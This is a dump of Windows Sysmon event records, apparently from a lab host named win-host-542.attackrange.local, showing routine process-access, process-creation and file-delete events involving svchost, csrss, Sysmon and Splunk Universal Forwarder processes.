09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980373Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980372Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980371Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980370Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980369Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980368Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980367Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980366Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980365Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-8C9E-6151-FA79-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980364Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.937{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C9E-6151-FA79-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000980363Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.922{69CF5F33-8C9E-6151-FA79-00000000FD01}3852C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000980362Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=FB3FEC09EB2C47D3EA1EFA9A429FEE5E,SHA256=CFFF807AA28F46C4F795B3A947FBA6687D5CF05635578B04FD7521A4A88F8D62,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000980361Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.859{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=673E21CCF6AB378E49BA01A95E878248,SHA256=7B70922159A632E956A5140CAF2640AA7F42DC8A6748A81318FC1A8E525AE07E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000980360Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.796{69CF5F33-8C9E-6151-F979-00000000FD01}39682660C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980359Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-8C9E-6151-F979-00000000FD01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980358Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980357Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980356Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980355Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980354Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980353Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980352Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980351Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980350Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000980349Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F27-614D-0500-00000000FD01}408524C:\Windows\system32\csrss.exe{69CF5F33-8C9E-6151-F979-00000000FD01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000980348Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:19:26.328{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-8C9E-6151-F979-00000000FD01}3968C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 